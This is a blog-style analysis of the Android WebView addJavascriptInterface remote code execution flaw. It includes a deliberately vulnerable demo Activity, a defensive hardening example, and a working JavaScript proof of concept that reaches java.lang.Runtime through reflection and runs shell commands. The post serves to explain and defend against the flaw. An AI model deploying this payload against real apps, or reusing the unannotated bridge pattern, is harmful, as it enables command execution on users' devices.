A Brief Analysis of the Android WebView Remote Code Execution Vulnerability

Posted by jltxgcy


   0x00

    This article follows the write-up "Android WebView 远程代码执行漏洞简析". The code is at https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo. Below we walk through that code.

    

   0x01

    First, the project layout:


    The code of MainActivity.java is as follows:

import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.webkit.JsResult;
import android.webkit.WebChromeClient;
import android.webkit.WebView;
import android.widget.Toast;

public class MainActivity extends Activity {
    private WebView webView;
    private Uri mUri;
    private String url;
    //String mUrl1 = "file:///android_asset/html/attack_file.html";
    String mUrl2 = "file:///android_asset/html/test.html";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        webView = (WebView) findViewById(R.id.webview);
        webView.getSettings().setJavaScriptEnabled(true);
        // Exposes every public method of JSInterface (including the inherited
        // getClass()) to the page's JavaScript: the root of the vulnerability.
        webView.addJavascriptInterface(new JSInterface(), "jsInterface");
        //webView.getSettings().setAllowFileAccessFromFileURLs(true);
        webView.setWebChromeClient(new WebChromeClient() {
            @Override
            public boolean onJsAlert(WebView view, String url, String message, JsResult result) {
                //Required functionality here
                return super.onJsAlert(view, url, message, result);
            }
        });
        webView.loadUrl(mUrl2);
    }

    // No @JavascriptInterface annotation: on targets below API 17 every public
    // method of this object is reachable from page JavaScript.
    class JSInterface {
        public String onButtonClick(String text) {
            final String str = text;
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Log.e("leehong2", "onButtonClick: text = " + str);
                    Toast.makeText(getApplicationContext(), "onButtonClick: text = " + str, Toast.LENGTH_LONG).show();
                }
            });

            return "This text is returned from Java layer.  js text = " + text;
        }

        public void onImageClick(String url, int width, int height) {
            final String str = "onImageClick: text = " + url + "  width = " + width + "  height = " + height;
            Log.i("leehong2", str);
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Toast.makeText(getApplicationContext(), str, Toast.LENGTH_LONG).show();
                }
            });
        }
    }

}

    The following two lines are what let the HTML loaded in the WebView call Java code from JavaScript:

webView.getSettings().setJavaScriptEnabled(true);
webView.addJavascriptInterface(new JSInterface(), "jsInterface");


    Next we look at the HTML file being loaded; it lives in the assets directory.

webView.loadUrl(mUrl2);


    test.html is as follows:

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <script>
      var i = 0;
      // Reads a java.io.InputStream byte by byte through the bridge.
      function getContents(inputStream)
      {
        var contents = "" + i;
        var b = inputStream.read();
        while (b != -1) {
            var bString = String.fromCharCode(b);
            contents += bString;
            contents += "\n";
            b = inputStream.read();
        }
        i = i + 1;
        return contents;
      }

      function execute(cmdArgs)
      {
        for (var obj in window) {
            console.log(window[obj]);
            if ("getClass" in window[obj]) {
                alert(obj);
                return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec(cmdArgs);
            }
        }
      }

      var p = execute(["ls", "/mnt/sdcard/"]);
      document.write(getContents(p.getInputStream()));
    </script>

    <script language="javascript">
      function onButtonClick()
      {
        // Call the method of injected object from Android source.
        var text = jsInterface.onButtonClick("从JS中传递过来的文本!!!");
        alert(text);
      }

      function onImageClick()
      {
        // Call the method of injected object from Android source.
        var src = document.getElementById("image").src;
        var width = document.getElementById("image").width;
        var height = document.getElementById("image").height;

        // Call the method of injected object from Android source.
        jsInterface.onImageClick(src, width, height);
      }
    </script>
  </head>

  <body>
    <p>点击图片把URL传到Java代码</p>
    <img class="curved_box" id="image"
         onclick="onImageClick()"
         width="328"
         height="185"
         src="http://t1.baidu.com/it/u=824022904,2596326488&fm=21&gp=0.jpg"
         onerror="this.src='background_chl.jpg'"/>
    <button type="button" onclick="onButtonClick()">与Java代码交互</button>
  </body>
</html>

    For an introduction to HTML and JavaScript, see http://www.w3school.com.cn/html/html_getstarted.asp

    The root cause of the vulnerability is the following code:

function execute(cmdArgs)
{
  for (var obj in window) {
      console.log(window[obj]);
      if ("getClass" in window[obj]) {
          alert(obj);
          return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null).exec(cmdArgs);
      }
  }
}

var p = execute(["ls", "/mnt/sdcard/"]);
    An attacker can locate an injected object that exposes a "getClass" method, use reflection to obtain the Java Runtime object, and then call its static method to execute system commands; that is what causes the damage.
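As an added example (written here, not code from the WebViewFileDemo project), the hardened counterpart of the bridge set-up above: it assumes a targetSdkVersion of 17 or higher in the manifest and uses a hypothetical helper class `HardenedBridge`.

```java
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

// Hypothetical helper class (added example, not part of the WebViewFileDemo project).
public final class HardenedBridge {

    // With targetSdkVersion >= 17 only methods annotated with @JavascriptInterface
    // are callable from page JavaScript, so the inherited getClass() is unreachable.
    static final class JSInterface {
        @JavascriptInterface
        public String onButtonClick(String text) {
            return "This text is returned from Java layer.  js text = " + text;
        }

        // Public but unannotated: invisible to JavaScript on API 17+.
        public void notExposed() {
        }
    }

    static void configure(WebView webView) {
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);
        // A file:// page must not be able to read other local files or other origins.
        settings.setAllowFileAccessFromFileURLs(false);
        settings.setAllowUniversalAccessFromFileURLs(false);

        // Only install the bridge where the platform enforces the annotation.
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(new JSInterface(), "jsInterface");
        }
        // Drop the bridges the WebView itself injects on some platform versions;
        // they are reachable by the same getClass() path as an application bridge.
        webView.removeJavascriptInterface("searchBoxJavaBridge_");
        webView.removeJavascriptInterface("accessibility");
        webView.removeJavascriptInterface("accessibilityTraversal");

        // Keep navigation inside the bundled assets so the bridge is never exposed
        // to attacker-controlled content fetched over the network.
        webView.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !url.startsWith("file:///android_asset/");
            }
        });
    }
}
```

On targets below API 17 the annotation is not enforced, so the only safe option there is to not call addJavascriptInterface at all.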

 For the program's detailed behaviour, download the code and run it yourself.
